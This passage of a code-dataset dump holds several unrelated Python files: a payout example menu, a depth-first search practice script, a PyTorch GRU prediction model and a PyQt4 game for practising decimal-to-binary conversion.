Please type a number\")\r\n return ask_payout_input()\r\n\r\n\r\ndef payout_example(xendit_instance):\r\n payout_input = ask_payout_input()\r\n while payout_input != 0:\r\n if payout_input == 1:\r\n print(\"Running example of Create Payout\")\r\n CreatePayout.example(xendit_instance)\r\n elif payout_input == 2:\r\n print(\"Running example of Get Payout\")\r\n GetPayout.example(xendit_instance)\r\n elif payout_input == 3:\r\n print(\"Running example of Void a Payout\")\r\n VoidPayout.example(xendit_instance)\r\n payout_input = ask_payout_input()\r\n","sub_path":"examples/payout_example.py","file_name":"payout_example.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"528597859","text":"class Graph(object):\n\n\tdef __init__(self):\n\t\tself.nodes = {}\n\n\tdef add_edge(self, from_node, to_node):\n\t\tself.nodes.setdefault(from_node, []).append(to_node)\n\n\ndef DFS(graph, root):\n\t\n\tvisited = [False] * len(graph.nodes)\n\n\tstack = []\n\tstack.append(root)\n\n\twhile stack != []:\n\t\tcurrent_node = stack.pop()\n\t\tprint('{}, '.format(current_node))\n\t\tvisited[current_node] = True\n\t\tfor i in range(1, len(graph.nodes[current_node])+1):\n\t\t\titem = graph.nodes[current_node][-1*i]\n\t\t\tif not visited[item]:\n\t\t\t\tstack.append(item)\n\n\treturn \n\n\ng = Graph()\ng.add_edge(0, 1)\ng.add_edge(0, 2)\ng.add_edge(1, 2)\ng.add_edge(2, 0)\ng.add_edge(2, 3)\ng.add_edge(3, 3)\n\nprint(g.nodes)\n\nDFS(g, 2)","sub_path":"python-practice/GeekforGeeks/dfs_graph_traversal_simple.py","file_name":"dfs_graph_traversal_simple.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"413566852","text":"import math\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass cat_gru_prediction(nn.Module):\n def __init__(self, config): # input_size, hidden_size, num_layers, num_classes):\n super(cat_gru_prediction, self).__init__()\n self.config = config\n self.hidden_size = config.hidden_size\n self.num_layers = config.num_layers\n # default skeleton timestep == 10, make 10 FC layer for every timestep\n self.gru = nn.GRU(self.config.input_size, self.config.hidden_size,\n self.config.num_layers, batch_first=True,\n dropout=self.config.dropout, bidirectional=False)\n teacher_feature_size = 512\n self.fc2 = nn.Linear(config.hidden_size, config.hidden_size)\n self.fc3 = nn.Linear(config.hidden_size, teacher_feature_size)\n self.fc4 = nn.Linear(config.hidden_size + teacher_feature_size, config.num_classes)\n self._initialize_weights()\n if torch.cuda.is_available():\n torch.cuda.set_device(config.DEFAULT_GPU)\n \n def multi_lstm(self, time_step):\n layer = []\n for _ in range(time_step):\n layer.append(nn.LSTM(self.config.input_size, self.config.hidden_size,\n self.config.num_layers, batch_first=True, dropout=self.config.dropout))\n return nn.Sequential(*layer)\n \n def multi_fc(self, time_step):\n layer = []\n for _ in range(time_step):\n layer.append(nn.Linear(self.config.hidden_size, self.config.num_classes))\n return nn.Sequential(*layer)\n \n def forward(self, x):\n # Set initial states\n h0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).cuda()\n # with torch.no_grad():\n if self.config.F == 'fc':\n with torch.no_grad():\n ht, _ = self.gru(x, h0)\n feature = [self.fc2(ht[:, i, :]) for i in range(ht.size(1))]\n feature = torch.stack(feature, dim=1)\n feature = [self.fc3(ht[:, i, :]) for i in 
range(feature.size(1))]\n feature = torch.stack(feature, dim=1)\n else:\n ht, _ = self.gru(x, h0)\n feature = [self.fc2(ht[:, i, :]) for i in range(ht.size(1))]\n feature = torch.stack(feature, dim=1)\n feature = [self.fc3(ht[:, i, :]) for i in range(feature.size(1))]\n feature = torch.stack(feature, dim=1)\n # ht.size() = (batch, T, hidden*direction), ht for the last layer in every time step\n # _ = (h_n, c_n), shape = (num_layers * num_directions, batch, hidden_size),\n # (h_n, c_n): ht and ct for the last time step in every lstm layer\n # Decode hidden state of all time step\n if self.config.F == 'feature':\n with torch.no_grad():\n cat = torch.cat([ht, feature], dim=-1)\n logit = [self.fc4(cat[:, i, :]) for i in range(cat.size(1))]\n logit = torch.stack(logit, dim=1)\n else:\n cat = torch.cat([ht, feature], dim=-1)\n logit = [self.fc4(cat[:, i, :]) for i in range(cat.size(1))]\n logit = torch.stack(logit, dim=1)\n return feature, logit\n \n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n for name, param in self.gru.named_parameters():\n if name.split('_')[0] == 'weight':\n nn.init.orthogonal_(param.data, gain=1)\n # param.data.normal_(0, 0.01)\n # if name.split('_')[0] == 'bias':\n # # set forget bias\n # param.data[self.hidden_size:self.hidden_size * 2].fill_(1)\n \n def get_param(self, lr):\n gru_id = [id(p) for p in self.gru.parameters()]\n fc_param = []\n for param in self.parameters():\n if id(param) not in gru_id:\n fc_param.append(param)\n return [{'params': self.gru.parameters(), 'lr': self.config.lstm_lr * lr},\n {'params': fc_param, 'lr': lr}]\n\n","sub_path":"models/cat_gru_prediction.py","file_name":"cat_gru_prediction.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"117868579","text":"#Network Binary Game\n\nimport sys\nfrom PyQt4 import QtGui,QtCore\nimport random\n\nversion = \"Network Binary Game Alpha v0.60\"\n\nclass IPHostClass(object):\n def __init__(self,num1,num2,num3,num4):\n self.num1 = num1\n self.num2 = num2\n self.num3 = num3\n self.num4 = num4\n\nmainIPHost = IPHostClass(0,0,0,0)\nhideAidMatrix = True\nvarInitialState = \"\"\nrandomNum1 = \"\"\ncurNumHolderVar128, curNumHolderVar64, curNumHolderVar32, curNumHolderVar16, curNumHolderVar8, curNumHolderVar4, curNumHolderVar2, curNumHolderVar1 = (varInitialState,)*8\nanswerDecVar128, answerDecVar64, answerDecVar32, answerDecVar16, answerDecVar8, answerDecVar4, answerDecVar2, answerDecVar1 = (varInitialState,)*8\nanswerBinaryInputVar128, answerBinaryInputVar64, answerBinaryInputVar32, answerBinaryInputVar16, answerBinaryInputVar8, answerBinaryInputVar4, answerBinaryInputVar2, answerBinaryInputVar1 = (varInitialState,)*8\n\n\ndef main():\n \n def numberProcessing():\n global curNumHolderVar128, curNumHolderVar64, curNumHolderVar32, curNumHolderVar16, curNumHolderVar8, curNumHolderVar4, curNumHolderVar2, curNumHolderVar1\n global answerDecVar128, answerDecVar64, answerDecVar32, answerDecVar16, answerDecVar8, answerDecVar4, answerDecVar2, answerDecVar1\n global answerBinaryInputVar128, answerBinaryInputVar64, answerBinaryInputVar32, 
answerBinaryInputVar16, answerBinaryInputVar8, answerBinaryInputVar4, answerBinaryInputVar2, answerBinaryInputVar1\n global randomNum1\n\n \"\"\"128\"\"\"\n if randomNum1 >= 128:\n curNumHolder128.setText(str(randomNum1))\n answerDecVar128 = randomNum1 - 128\n return\n elif answerBinaryInput128.text() != \"1\": \n answerBinaryInput128.setText(\"0\")\n answerBinaryInputVar128 = \"0\"\n \"\"\"//128\"\"\"\n \n \"\"\"64\"\"\" \n if randomNum1 < 128 and randomNum1 >= 64:\n curNumHolder64.setText(str(randomNum1))\n answerDecVar64 = randomNum1 - 64\n return\n elif answerBinaryInput64.text() != \"1\":\n answerBinaryInput64.setText(\"0\")\n answerBinaryInputVar64 = \"0\"\n \"\"\"//64\"\"\"\n \n \"\"\"32\"\"\"\n if randomNum1 < 64 and randomNum1 >= 32:\n curNumHolder32.setText(str(randomNum1))\n answerDecVar32 = randomNum1 - 32\n return\n elif answerBinaryInput32.text() != \"1\":\n answerBinaryInput32.setText(\"0\")\n answerBinaryInputVar32 = \"0\"\n \"\"\"//32\"\"\"\n \n \"\"\"16\"\"\"\n if randomNum1 < 32 and randomNum1 >= 16:\n curNumHolder16.setText(str(randomNum1))\n answerDecVar16 = randomNum1 - 16\n return\n elif answerBinaryInput16.text() != \"1\":\n answerBinaryInput16.setText(\"0\")\n answerBinaryInputVar16 = \"0\"\n \"\"\"//16\"\"\"\n \n \"\"\"8\"\"\"\n if randomNum1 < 16 and randomNum1 >= 8:\n curNumHolder8.setText(str(randomNum1))\n answerDecVar8 = randomNum1 - 8\n return\n elif answerBinaryInput8.text() != \"1\":\n answerBinaryInput8.setText(\"0\")\n answerBinaryInputVar8 = \"0\"\n \"\"\"//8\"\"\"\n \n \"\"\"4\"\"\"\n if randomNum1 < 8 and randomNum1 >= 4:\n curNumHolder4.setText(str(randomNum1))\n answerDecVar4 = randomNum1 - 4\n return\n elif answerBinaryInput4.text() != \"1\":\n answerBinaryInput4.setText(\"0\")\n answerBinaryInputVar4 = \"0\"\n \"\"\"//4\"\"\"\n \n \"\"\"2\"\"\"\n if randomNum1 < 4 and randomNum1 >= 2:\n curNumHolder2.setText(str(randomNum1))\n answerDecVar2 = randomNum1 - 2\n return\n elif answerBinaryInput2.text() != \"1\":\n answerBinaryInput2.setText(\"0\")\n answerBinaryInputVar2 = \"0\"\n \"\"\"//2\"\"\"\n \n \"\"\"1\"\"\"\n if randomNum1 < 2 and randomNum1 >= 1:\n curNumHolder1.setText(str(randomNum1))\n answerDecVar1 = randomNum1 - 1\n return\n elif answerBinaryInput1.text() != \"1\":\n answerBinaryInput1.setText(\"0\")\n answerBinaryInputVar1 = \"0\"\n \"\"\"//1\"\"\"\n \n def checkAnswer128():\n global randomNum1\n \n if answerDecInput128.text() == str(answerDecVar128):\n answerDecInput128.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput128.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput128.setText(\"1\")\n randomNum1 = int(answerDecVar128)\n numberProcessing()\n else:\n answerDecInput128.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput128.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput128.setText(\"\")\n def checkAnswer64():\n global randomNum1\n if answerDecInput64.text() == str(answerDecVar64):\n answerDecInput64.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput64.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput64.setText(\"1\")\n randomNum1 = int(answerDecVar64)\n numberProcessing()\n else:\n answerDecInput64.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput64.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput64.setText(\"\")\n def checkAnswer32():\n global randomNum1\n if answerDecInput32.text() == str(answerDecVar32):\n answerDecInput32.setStyleSheet(\"QWidget { 
background-color:green}\")\n answerBinaryInput32.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput32.setText(\"1\")\n randomNum1 = int(answerDecVar32)\n numberProcessing()\n else:\n answerDecInput32.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput32.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput32.setText(\"\")\n def checkAnswer16():\n global randomNum1\n if answerDecInput16.text() == str(answerDecVar16):\n answerDecInput16.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput16.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput16.setText(\"1\")\n randomNum1 = int(answerDecVar16)\n numberProcessing()\n else:\n answerDecInput16.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput16.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput16.setText(\"\")\n def checkAnswer8():\n global randomNum1\n if answerDecInput8.text() == str(answerDecVar8):\n answerDecInput8.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput8.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput8.setText(\"1\")\n randomNum1 = int(answerDecVar8)\n numberProcessing()\n else:\n answerDecInput8.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput8.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput8.setText(\"\")\n def checkAnswer4():\n global randomNum1\n if answerDecInput4.text() == str(answerDecVar4):\n answerDecInput4.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput4.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput4.setText(\"1\")\n randomNum1 = int(answerDecVar4)\n numberProcessing()\n else:\n answerDecInput4.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput4.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput4.setText(\"\")\n def checkAnswer2():\n global randomNum1\n if answerDecInput2.text() == str(answerDecVar2):\n answerDecInput2.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput2.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput2.setText(\"1\")\n randomNum1 = int(answerDecVar2)\n numberProcessing()\n else:\n answerDecInput2.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput2.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput2.setText(\"\")\n def checkAnswer1():\n global randomNum1\n if answerDecInput1.text() == str(answerDecVar1):\n answerDecInput1.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput1.setStyleSheet(\"QWidget { background-color:green}\")\n answerBinaryInput1.setText(\"1\")\n randomNum1 = int(answerDecVar1)\n numberProcessing()\n else:\n answerDecInput1.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput1.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput1.setText(\"\")\n \n \n def getNewNum():\n global randomNum1\n \"\"\"Clear Initial state\"\"\"\n global varInitialState\n varInitialState = \"\"\n answerDecInput128.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput64.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput32.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput16.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput8.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput4.setStyleSheet(\"QWidget { background-color:white}\")\n 
answerDecInput2.setStyleSheet(\"QWidget { background-color:white}\")\n answerDecInput1.setStyleSheet(\"QWidget { background-color:white}\")\n \n answerBinaryInput128.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput64.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput32.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput16.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput8.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput4.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput2.setStyleSheet(\"QWidget { background-color:white}\")\n answerBinaryInput1.setStyleSheet(\"QWidget { background-color:white}\")\n \n curNumHolder128.setText(varInitialState)\n curNumHolder64.setText(varInitialState)\n curNumHolder32.setText(varInitialState)\n curNumHolder16.setText(varInitialState)\n curNumHolder8.setText(varInitialState)\n curNumHolder4.setText(varInitialState)\n curNumHolder2.setText(varInitialState)\n curNumHolder1.setText(varInitialState)\n \n answerDecInput128.setText(varInitialState)\n answerDecInput64.setText(varInitialState)\n answerDecInput32.setText(varInitialState)\n answerDecInput16.setText(varInitialState)\n answerDecInput8.setText(varInitialState)\n answerDecInput4.setText(varInitialState)\n answerDecInput2.setText(varInitialState)\n answerDecInput1.setText(varInitialState)\n \n answerBinaryInput128.setText(varInitialState)\n answerBinaryInput64.setText(varInitialState)\n answerBinaryInput32.setText(varInitialState)\n answerBinaryInput16.setText(varInitialState)\n answerBinaryInput8.setText(varInitialState)\n answerBinaryInput4.setText(varInitialState)\n answerBinaryInput2.setText(varInitialState)\n answerBinaryInput1.setText(varInitialState)\n \"\"\"//Clear Initial state\"\"\"\n \n \"\"\"Get random values for the IP address\"\"\"\n mainIPHost.num1 = random.randrange(0,255)\n \"\"\"//Get random values for the IP address\"\"\"\n randomNum1 = mainIPHost.num1\n numberProcessing()\n \"\"\"Convert values to string for setText\"\"\"\n mainIPnumbersToStr1= str(mainIPHost.num1)\n \"\"\"//Convert values to string for setText\"\"\"\n \n \"\"\"Final binary values and variables\"\"\"\n mainIPnumbersBin1= \"{0:08b}\".format(mainIPHost.num1)\n \"\"\"//Final binary values and variables\"\"\"\n \n def showHideAidMatrix():\n global hideAidMatrix\n if hideAidMatrix is False:\n hideAidMatrix = True\n elif hideAidMatrix is True:\n hideAidMatrix = False \n \"\"\"Hides/Shows the Main Aid Matrix\"\"\"\n labelForMainMatrix.setHidden(hideAidMatrix)\n mainAidMatrix128.setHidden(hideAidMatrix)\n mainAidMatrix64.setHidden(hideAidMatrix)\n mainAidMatrix32.setHidden(hideAidMatrix)\n mainAidMatrix16.setHidden(hideAidMatrix)\n mainAidMatrix8.setHidden(hideAidMatrix)\n mainAidMatrix4.setHidden(hideAidMatrix)\n mainAidMatrix2.setHidden(hideAidMatrix)\n mainAidMatrix1.setHidden(hideAidMatrix)\n \"\"\"//Hides/Shows the Main Aid Matrix\"\"\"\n \n \"\"\"Hides/Shows the Secondary Aid Matrix\"\"\"\n labelForSecMatrix.setHidden(hideAidMatrix)\n secAidMatrix128.setHidden(hideAidMatrix)\n secAidMatrix64.setHidden(hideAidMatrix)\n secAidMatrix32.setHidden(hideAidMatrix)\n secAidMatrix16.setHidden(hideAidMatrix)\n secAidMatrix8.setHidden(hideAidMatrix)\n secAidMatrix4.setHidden(hideAidMatrix)\n secAidMatrix2.setHidden(hideAidMatrix)\n secAidMatrix1.setHidden(hideAidMatrix)\n \"\"\"//Hides/Shows the Secondary Aid Matrix\"\"\"\n \n \"\"\"Main Application\"\"\"\n binaryGame = QtGui.QApplication(sys.argv)\n 
mainWindow = QtGui.QWidget()\n mainWindow.setWindowTitle(version)\n mainWindow.show()\n \"\"\"//Main Application\"\"\"\n \n \"\"\"Button New number\"\"\"\n newNumButton = QtGui.QPushButton(\"New Number\", mainWindow)\n newNumButton.show()\n QtCore.QObject.connect(newNumButton, QtCore.SIGNAL(\"clicked()\"), getNewNum)\n \"\"\"//Button New number\"\"\"\n \n \"\"\"Button Aid Matrix Show/Hide\"\"\"\n buttonHideShowMatrix = QtGui.QPushButton(\"Aid Matrix\", mainWindow)\n buttonHideShowMatrix.show()\n buttonHideShowMatrix.connect(buttonHideShowMatrix, QtCore.SIGNAL(\"clicked()\"), showHideAidMatrix)\n \"\"\"//Button Aid Matrix Show/Hide\"\"\"\n \n \"\"\"Binary 8bits Buttons\"\"\"\n labelForBinButtons = QtGui.QLabel(\"\",mainWindow)\n labelForBinButtons.setMinimumSize(120,0)\n labelForBinButtons.show()\n buttonBin128= QtGui.QPushButton(\"128\", mainWindow)\n buttonBin128.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin128.setDisabled(True)\n buttonBin64= QtGui.QPushButton(\"64\", mainWindow)\n buttonBin64.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin64.setDisabled(True)\n buttonBin32= QtGui.QPushButton(\"32\", mainWindow)\n buttonBin32.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin32.setDisabled(True)\n buttonBin16= QtGui.QPushButton(\"16\", mainWindow)\n buttonBin16.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin16.setDisabled(True)\n buttonBin8= QtGui.QPushButton(\"8\", mainWindow)\n buttonBin8.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin8.setDisabled(True)\n buttonBin4= QtGui.QPushButton(\"4\", mainWindow)\n buttonBin4.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin4.setDisabled(True)\n buttonBin2= QtGui.QPushButton(\"2\", mainWindow)\n buttonBin2.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin2.setDisabled(True)\n buttonBin1= QtGui.QPushButton(\"1\", mainWindow)\n buttonBin1.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin1.setDisabled(True)\n \"\"\"//Binary 8bits Buttons\"\"\"\n\n \"\"\"Current Number Holders\"\"\"\n labelForCurrentNumHolders = QtGui.QLabel(\"Current Number:\", mainWindow)\n labelForCurrentNumHolders.setAlignment(QtCore.Qt.AlignRight)\n labelForCurrentNumHolders.setMinimumSize(120,0)\n labelForCurrentNumHolders.show()\n curNumHolder128 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder128.setText(curNumHolderVar128)\n curNumHolder128.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder128.setReadOnly(True)\n curNumHolder128.show()\n curNumHolder64 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder64.setText(curNumHolderVar64)\n curNumHolder64.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder64.setReadOnly(True)\n curNumHolder64.show()\n curNumHolder32 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder32.setText(curNumHolderVar32)\n curNumHolder32.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder32.setReadOnly(True)\n curNumHolder32.show()\n curNumHolder16 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder16.setText(curNumHolderVar16)\n curNumHolder16.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder16.setReadOnly(True)\n curNumHolder16.show()\n curNumHolder8 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder8.setText(curNumHolderVar8)\n curNumHolder8.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder8.setReadOnly(True)\n curNumHolder8.show()\n curNumHolder4 = QtGui.QLineEdit(\"\",mainWindow)\n 
curNumHolder4.setText(curNumHolderVar4)\n curNumHolder4.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder4.setReadOnly(True)\n curNumHolder4.show()\n curNumHolder2 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder2.setText(curNumHolderVar2)\n curNumHolder2.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder2.setReadOnly(True)\n curNumHolder2.show()\n curNumHolder1 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder1.setText(curNumHolderVar1)\n curNumHolder1.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder1.setReadOnly(True)\n curNumHolder1.show()\n \"\"\"//Calculation Holders\"\"\"\n \n \"\"\"Main Aid Matrix\"\"\"\n labelForMainMatrix = QtGui.QLabel(\"Subtract:\", mainWindow)\n labelForMainMatrix.setMinimumSize(120,0)\n labelForMainMatrix.setAlignment(QtCore.Qt.AlignRight)\n labelForMainMatrix.setHidden(hideAidMatrix)\n mainAidMatrix128 = QtGui.QLabel(\"-130\", mainWindow)\n mainAidMatrix128.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n mainAidMatrix128.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix128.setHidden(hideAidMatrix)\n mainAidMatrix64 = QtGui.QLabel(\"-70\", mainWindow)\n mainAidMatrix64.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n mainAidMatrix64.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix64.setHidden(hideAidMatrix)\n mainAidMatrix32 = QtGui.QLabel(\"-40\", mainWindow)\n mainAidMatrix32.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix32.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix32.setHidden(hideAidMatrix)\n mainAidMatrix16 = QtGui.QLabel(\"-20\", mainWindow)\n mainAidMatrix16.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix16.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix16.setHidden(hideAidMatrix)\n mainAidMatrix8 = QtGui.QLabel(\"-10\", mainWindow)\n mainAidMatrix8.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix8.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix8.setHidden(hideAidMatrix)\n mainAidMatrix4 = QtGui.QLabel(\"\", mainWindow)\n mainAidMatrix4.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix4.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix4.setHidden(hideAidMatrix)\n mainAidMatrix2 = QtGui.QLabel(\"\", mainWindow)\n mainAidMatrix2.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix2.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix2.setHidden(hideAidMatrix)\n mainAidMatrix1 = QtGui.QLabel(\"\", mainWindow)\n mainAidMatrix1.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix1.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix1.setHidden(hideAidMatrix)\n \"\"\"//Main Aid Matrix\"\"\"\n \n \"\"\"Secondary Aid Matrix\"\"\"\n labelForSecMatrix = QtGui.QLabel(\"Add:\", mainWindow)\n labelForSecMatrix.setAlignment(QtCore.Qt.AlignRight)\n labelForSecMatrix.setMinimumSize(120,0)\n labelForSecMatrix.setHidden(hideAidMatrix)\n secAidMatrix128 = QtGui.QLabel(\"+2\", mainWindow)\n secAidMatrix128.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n secAidMatrix128.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix128.setHidden(hideAidMatrix)\n secAidMatrix64 = QtGui.QLabel(\"+6\", mainWindow)\n secAidMatrix64.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix64.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix64.setHidden(hideAidMatrix)\n secAidMatrix32 = QtGui.QLabel(\"+8\", mainWindow)\n 
secAidMatrix32.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix32.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix32.setHidden(hideAidMatrix)\n secAidMatrix16 = QtGui.QLabel(\"+4\", mainWindow)\n secAidMatrix16.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix16.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix16.setHidden(hideAidMatrix)\n secAidMatrix8 = QtGui.QLabel(\"+2\", mainWindow)\n secAidMatrix8.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix8.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix8.setHidden(hideAidMatrix)\n secAidMatrix4 = QtGui.QLabel(\"\", mainWindow)\n secAidMatrix4.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix4.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix4.setHidden(hideAidMatrix)\n secAidMatrix2 = QtGui.QLabel(\"\", mainWindow)\n secAidMatrix2.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix2.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix2.setHidden(hideAidMatrix)\n secAidMatrix1 = QtGui.QLabel(\"\", mainWindow)\n secAidMatrix1.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix1.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix1.setHidden(hideAidMatrix)\n \"\"\"//Secondary Aid Matrix\"\"\"\n \n \"\"\"Answer Input Holders\"\"\"\n labelForanswerDecInput = QtGui.QLabel(\"Subtraction Remainder:\")\n labelForanswerDecInput.setMinimumSize(120,0)\n labelForanswerDecInput.setAlignment(QtCore.Qt.AlignRight)\n labelForanswerDecInput.show()\n answerDecInput128 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput128.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput128.setText(varInitialState)\n answerDecInput128.connect(answerDecInput128, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer128)\n answerDecInput128.show()\n answerDecInput64 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput64.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput64.setText(varInitialState)\n answerDecInput64.connect(answerDecInput64, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer64)\n answerDecInput64.show()\n answerDecInput32 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput32.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput32.setText(varInitialState)\n answerDecInput32.connect(answerDecInput32, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer32)\n answerDecInput32.show()\n answerDecInput16 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput16.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput16.setText(varInitialState)\n answerDecInput16.connect(answerDecInput16, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer16)\n answerDecInput16.show()\n answerDecInput8 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput8.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput8.setText(varInitialState)\n answerDecInput8.connect(answerDecInput8, 